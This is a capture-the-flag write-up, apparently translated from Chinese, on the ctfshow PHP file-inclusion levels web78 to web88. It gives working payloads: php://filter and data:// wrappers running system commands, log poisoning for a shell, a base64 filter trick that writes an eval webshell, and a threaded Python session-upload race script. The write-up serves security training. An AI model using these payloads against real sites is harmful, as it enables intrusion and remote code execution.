ctfshow_file contains

WEB78

Nothing to talk about

payload:?file=php://filter/read=convert.base64-encode/resource=falg.php

web79

if(isset($_GET['file'])){
    
    
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    
    
    highlight_file(__FILE__);
}

Let's take a look at the source code first. The previous payload is no longer available, because PHP is filtered, so here we directly change the method. Reference article: https://www.freebuf.com/column/148886.html
uses this sentence

payload:?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

Found that it can be executed, then we execute another command to execute it.
There is a pitfall here, that is, the label cannot be closed. <?php system('cat flag.php');

payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

web80

if(isset($_GET['file'])){
    
    
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    
    
    highlight_file(__FILE__);
}

Reference article locally included

Log getshell

Capture packet to change user_Agent
ant sword connection

It is not possible to use include between data protocols, you need to bypass open_basedir

Reference link php pseudo-protocol to realize the seven postures of command execution

/var/log/nginx/access.log

web81

The same as 80 is also included in the log.

web82_86

Kill the script directly

import io
import requests
import threading

sessID = 'flag'
url = 'http://296b5d26-334c-4459-b7a6-b16db5aad264.challenge.ctf.show:8080/'

# 1.设置信号
# 使用Event的set()方法可以设置Event对象内部的信号标志为真。Event对象提供了isSet()方法来判断其内部信号标志的状态，当使用event对象的set()方法后，isSet()方法返回真.

def write(session):
    while event.isSet():
        f = io.BytesIO(b'a' * 1024 * 50)
        response = session.post(
            url,
            cookies={
    
    'PHPSESSID': sessID},
            data={
    
    'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("cat *.php");?>'},
            files={
    
    'file': ('test.txt', f)}
        )


def read(session):
    while event.isSet():
        response = session.get(url + '?file=/tmp/sess_{}'.format(sessID))
        if 'test' in response.text:
            print(response.text)
            event.clear()
        else:
            print('[*]retrying...')


if __name__ == '__main__':
    event = threading.Event()
    event.set()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()

WEB87

Reference link

Different variables die to bypass.

if(isset($_GET['file'])){
    
    
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

    
}else{
    
    
    highlight_file(__FILE__);
}

Base64 can be bypassed/it
happens that phpdie is exactly 6 bytes, plus 2 is a multiple of 4, which can be decoded by bse64.
Construct
php://filter/write=convert.base64-decode/resource=1.php
url after encoding twice

payload
file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30

content=aaPD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==



The use
of php://filter, talk about the magic of php://filter

web88

if(isset($_GET['file'])){
    
    
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
    
    
        die("error");
    }
    include($file);
}else{
    
    
    highlight_file(__FILE__);
}

1. Filtered. File pseudo-protocol cannot be used.
2. Filtered. php php:// protocol cannot be used.
3. I don’t know the absolute path zip:// & bzip2:// & zlib:// protocol
4. No filtering.\ \ You can use the data:// protocol
payload (remember to delete the = sign because it is filtered)

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTsgPz4

The reference article uses the data pseudo protocol to bypass the parentheses and backticks to be filtered